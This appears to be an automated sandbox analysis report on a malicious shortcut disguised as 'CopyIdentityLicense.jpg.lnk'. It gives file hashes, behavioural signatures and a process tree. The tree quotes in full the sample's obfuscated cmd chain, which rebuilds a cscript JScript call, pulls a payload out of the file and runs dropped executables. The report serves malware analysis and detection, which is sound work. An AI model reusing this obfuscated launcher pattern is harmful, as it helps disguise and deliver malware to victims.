Analysis
-
max time kernel
4294197s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
17-03-2022 13:21
Behavioral task
behavioral1
Sample
CopyIdentityLicense.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
CopyIdentityLicense.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral3
Sample
CopySwisscomstatement.pdf
Resource
win7-20220311-en
Behavioral task
behavioral4
Sample
CopySwisscomstatement.pdf
Resource
win10v2004-20220310-en
General
-
Target
CopyIdentityLicense.jpg.lnk
-
Size
602KB
-
MD5
d1f069c6021aba84d1fa010295312315
-
SHA1
85f3f53c12a8bb7d9525b5d30ec51fdc354c1a21
-
SHA256
a0ec772fd0d24ce6e5c8ffd9ec018f3b2463d6d0246d8cb9b8bbbe9230dba330
-
SHA512
710be7d2ad7f1ad2416b29b4d4b6ebd335ecdeb778b41ea2e12a3b4ef6a6df4f2e5908117b58a15e96dfde8e3bf79b7da6ba362b915ffb33e9aef904df91edf9
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
main.exeRdrCER.exepid process 1704 main.exe 988 RdrCER.exe -
Deletes itself 1 IoCs
Processes:
cscript.exepid process 1556 cscript.exe -
Loads dropped DLL 4 IoCs
Processes:
main.exepid process 1704 main.exe 1704 main.exe 1704 main.exe 1704 main.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
Processes:
cmd.exepid process 1956 cmd.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.execscript.exetaskeng.exemain.exedescription pid process target process PID 1800 wrote to memory of 1492 1800 cmd.exe cmd.exe PID 1800 wrote to memory of 1492 1800 cmd.exe cmd.exe PID 1800 wrote to memory of 1492 1800 cmd.exe cmd.exe PID 1492 wrote to memory of 2028 1492 cmd.exe PING.EXE PID 1492 wrote to memory of 2028 1492 cmd.exe PING.EXE PID 1492 wrote to memory of 2028 1492 cmd.exe PING.EXE PID 1492 wrote to memory of 2020 1492 cmd.exe cmd.exe PID 1492 wrote to memory of 2020 1492 cmd.exe cmd.exe PID 1492 wrote to memory of 2020 1492 cmd.exe cmd.exe PID 2020 wrote to memory of 1052 2020 cmd.exe fc.exe PID 2020 wrote to memory of 1052 2020 cmd.exe fc.exe PID 2020 wrote to memory of 1052 2020 cmd.exe fc.exe PID 2020 wrote to memory of 1088 2020 cmd.exe cmd.exe PID 2020 wrote to memory of 1088 2020 cmd.exe cmd.exe PID 2020 wrote to memory of 1088 2020 cmd.exe cmd.exe PID 1088 wrote to memory of 656 1088 cmd.exe chkdsk.exe PID 1088 wrote to memory of 656 1088 cmd.exe chkdsk.exe PID 1088 wrote to memory of 656 1088 cmd.exe chkdsk.exe PID 1088 wrote to memory of 2000 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 2000 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 2000 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 1236 1088 cmd.exe find.exe PID 1088 wrote to memory of 1236 1088 cmd.exe find.exe PID 1088 wrote to memory of 1236 1088 cmd.exe find.exe PID 1088 wrote to memory of 1956 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 1956 1088 cmd.exe cmd.exe PID 1088 wrote to memory of 1956 1088 cmd.exe cmd.exe PID 1956 wrote to memory of 956 1956 cmd.exe sort.exe PID 1956 wrote to memory of 956 1956 cmd.exe sort.exe PID 1956 wrote to memory of 956 1956 cmd.exe sort.exe PID 1956 wrote to memory of 1872 1956 cmd.exe cmd.exe PID 1956 wrote to memory of 1872 1956 cmd.exe cmd.exe PID 1956 wrote to memory of 1872 1956 cmd.exe cmd.exe PID 1872 wrote to memory of 952 1872 cmd.exe cscript.exe PID 1872 wrote to memory of 952 1872 cmd.exe cscript.exe PID 1872 wrote to memory of 952 1872 cmd.exe cscript.exe PID 952 wrote to memory of 1556 952 cscript.exe cscript.exe PID 952 wrote to memory of 1556 952 cscript.exe cscript.exe PID 952 wrote to memory of 1556 952 cscript.exe cscript.exe PID 1972 wrote to memory of 1704 1972 taskeng.exe main.exe PID 1972 wrote to memory of 1704 1972 taskeng.exe main.exe PID 1972 wrote to memory of 1704 1972 taskeng.exe main.exe PID 1972 wrote to memory of 1704 1972 taskeng.exe main.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe PID 1704 wrote to memory of 988 1704 main.exe RdrCER.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CopyIdentityLicense.jpg.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping /? & set yc=Ve& cmd /c "echo hello& set he=cS& set lq=%cd%& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//^& (for /d %i in ("%ua%%pv%%eo%") do echo ok ^& for %e in ("%i\Co*pg*") do cd %i ^& set u=1) ^& set bm=cr^& chkdsk /? ^& set pl=cO^& set ox=:J^& type "Co*pg*"^|find "VER1"^>"%ua%wct7ZD7ASHB.%gd%" ^& cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" ^& echo dn""""2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\PING.EXEping /?3⤵
- Runs ping.exe
PID:2028 -
C:\Windows\system32\cmd.execmd /c "echo hello& set he=cS& set lq=C:\Users\Admin\AppData\Local\Temp& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn""""3⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\system32\fc.exefc4⤵PID:1052
-
C:\Windows\system32\cmd.execmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run & (if not %u%==1 (%ne%Ve /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) & sort /? & cd %lq% & date /? & set zu=%he%%bm%%eo%t & cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn"""4⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\chkdsk.exechkdsk /?5⤵PID:656
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type "Co*pg*""5⤵PID:2000
-
C:\Windows\system32\find.exefind "VER1"5⤵PID:1236
-
C:\Windows\system32\cmd.execmd /c " title run & (if not %u%==1 (mOVe /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\") else (%pl%Py /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\" )) & sort /? & cd C:\Users\Admin\AppData\Local\Temp & date /? & set zu=cS%bm%ipt & cmd /c " %zu% "%gp%E%ox%S%bm%ipt" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat"5⤵
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\sort.exesort /?6⤵PID:956
-
C:\Windows\system32\cmd.execmd /c " %zu% "//E:JScript" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat6⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\cscript.execScript "//E:JScript" C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat7⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat"8⤵
- Deletes itself
PID:1556
-
C:\Windows\system32\taskeng.exetaskeng.exe {9FCBC35C-5400-47A0-B244-B29CF99B3AF0} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe -p"29GGZr" -sp"""NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy"" ""devDISMWKI.tmp"" ""NTM0OTQ0"" ""Ni4xLjc2MDE%3D"" 0 ""65C36820"" ""MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D"" 0"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe" "NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy" "devDISMWKI.tmp" "NTM0OTQ0" "Ni4xLjc2MDE%3D" 0 "65C36820" "MzE4NTQ5d2N0ZH1hcGZkdFBUWl8%3D" 03⤵
- Executes dropped EXE
PID:988
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.datMD5
59ccd44bbee1ab8e2a93f5e336938990
SHA1cc840273d4c785de3f43bf69d0ea1d5a166bcd44
SHA256a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
SHA5122f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeMD5
f3faa3ce284dea4709353aa4fd17b11e
SHA13903fc1d299e435288f123e538f2a3912e5f5813
SHA2561ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
SHA512fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exeMD5
f3faa3ce284dea4709353aa4fd17b11e
SHA13903fc1d299e435288f123e538f2a3912e5f5813
SHA2561ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
SHA512fae7a385b8da1dadc66b2a296976fcc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
-
C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.datMD5
59ccd44bbee1ab8e2a93f5e336938990
SHA1cc840273d4c785de3f43bf69d0ea1d5a166bcd44
SHA256a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
SHA5122f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
-
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exeMD5
e1b17e3ed49f8b4f08c9bef6e17c4a47
SHA1f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
SHA256c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
SHA512e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
-
memory/1704-95-0x0000000075081000-0x0000000075083000-memory.dmpFilesize
8KB
-
memory/1800-54-0x000007FEFB551000-0x000007FEFB553000-memory.dmpFilesize
8KB